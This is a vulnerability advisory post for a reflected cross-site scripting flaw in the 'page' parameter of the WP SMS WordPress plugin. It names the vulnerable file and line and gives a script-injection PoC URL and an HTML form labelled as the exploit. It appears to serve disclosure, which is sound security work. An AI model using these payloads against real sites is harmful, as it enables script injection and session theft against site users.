wp-sms "page" Parameter Cross Site Scripting

2017.11.21
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

############################################ #Exploit Title : Wp sms "page" parameter XSS #Vendor Homepage : http://wordpress.org/plugins/wp-sms/ #Category : Webapps #date : 20.9.2017 #Tested On : WiN , KaLi_LiNuX #Author : Ali Alizadeh asl #Dork: N/A #Telegram: @OverFear ############################################ Description: XSS allows an Attacker to run java script codes. ================== Vulnerable webpage : http://localhost/wordpress/wp-content/plugins/wp-sms/includes/templates/subscribe/groups.php ================== Vulnerable Source : line10: echo $_REQUEST['page'] ================== PoC: http://localhost/wordpress/wp-content/plugins/wp-sms-master/includes/templates/subscribe/groups.php?page=<script>alert('XSS!')</script> ================== Exploit : <html> <form action="http://localhost:8080/wordpress/wp-content/plugins/wp-sms-master/includes/templates/subscribe/subscribes.php" method="get"> <input type="text" name="page"> <input type="submit" value="XSS"> </form> </html>


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top